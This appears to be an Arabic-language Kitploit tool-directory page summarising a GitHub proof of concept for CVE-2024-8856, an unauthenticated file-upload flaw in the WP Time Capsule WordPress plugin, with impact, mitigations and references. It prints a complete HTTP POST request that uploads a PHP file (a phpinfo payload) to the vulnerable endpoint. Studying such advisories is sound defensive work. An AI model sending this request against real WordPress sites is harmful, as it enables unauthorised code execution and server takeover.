Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ubaydev/cve-2024-8856
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHububaydev/cve-2024-8856

CVE-2024-8856

ثغرة رفع ملفات عشوائي في إضافة WP Time Capsule لـ WordPress

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-8856: ثغرة رفع ملفات تعسفية في إضافة WP Time Capsule لووردبريس

نظرة عامة

CVE-2024-8856 هي ثغرة أمنية تم اكتشافها في إضافة WP Time Capsule لووردبريس، وتسمح للمستخدمين غير المصادَق عليهم برفع ملفات تعسفية إلى الخادم. يمكن أن يؤدي ذلك إلى تنفيذ تعليمات برمجية عن بُعد (RCE) إذا قام الخادم بتنفيذ الملفات المرفوعة. تنشأ الثغرة بسبب عدم كفاية التحقق من صحة الملفات، ويمكن استغلالها عبر إرسال طلبات مصممة خصيصًا إلى نقطة النهاية المعرّضة للخطر.

الإصدارات المتأثرة

  • الإصدارات الأقدم من إضافة WP Time Capsule قبل الإصدار 1.22.21 (تم إصلاحها في الإصدار 1.22.22).

التأثير

تسمح هذه الثغرة للمستخدمين غير المصادَق عليهم بـ:

  • رفع سكربتات PHP خبيثة إلى الخادم.
  • تنفيذ كود تعسفي على الخادم، مما يؤدي إلى اختراق كامل للنظام.
  • إمكانية استغلال هذا الوصول لمزيد من استهداف تطبيق الويب والبنية التحتية الأساسية.

إثبات المفهوم (PoC)

فيما يلي إثبات مفهوم يوضح كيفية استغلال ثغرة CVE-2024-8856 عبر إرسال طلب POST إلى نقطة النهاية المعرّضة للخطر.

طلب تجريبي

root@kitploit:~
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close

------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql

<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--

شرح إثبات المفهوم

  • طلب POST: الطلب هو POST إلى المسار الذي تتواجد فيه وظيفة الرفع المعرّضة للخطر.
  • نوع المحتوى: يحدد الطلب Content-Type إلى multipart/form-data، وهو مطلوب لرفع الملفات.
  • رفع الملف: يتم تحديد الملف في نص الطلب عبر ترويسة Content-Disposition. في المثال، يحاول رفع ملف PHP يحتوي على <?php phpinfo();، والذي سيعرض تفاصيل إعدادات PHP إذا تم تنفيذه.
  • نقطة النهاية المعرّضة: نقطة النهاية /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php هي موضع الاستغلال.

التخفيف

لتخفيف هذه الثغرة:

  • تحديث الإضافة: تأكد دائمًا من تحديث إضافة WP Time Capsule إلى أحدث إصدار يوفره المطوّر.
  • قيود رفع الملفات: فرض قيود على رفع الملفات على الخادم للسماح فقط بأنواع ملفات محددة (مثل الصور)، ومنع تنفيذ الملفات المرفوعة.
  • جدار حماية تطبيقات الويب (WAF): استخدم جدار حماية تطبيقات الويب (WAF) لكشف وحظر الطلبات الخبيثة قبل وصولها إلى الخادم الخاص بك.

المراجع

CVE-2024-8856 - قاعدة بيانات الثغرات الوطنية

الخلاصة

CVE-2024-8856 هي ثغرة خطيرة تتطلب اهتمامًا فوريًا من مسؤولي مواقع WordPress التي تستخدم إضافة WP Time Capsule. ينبغي اتخاذ الاحتياطات المناسبة لتأمين التطبيق ضد الاستغلال المحتمل. حافظ دائمًا على مواكبة الممارسات الأمنية وتحديثات الإضافات.

تنزيل الأداة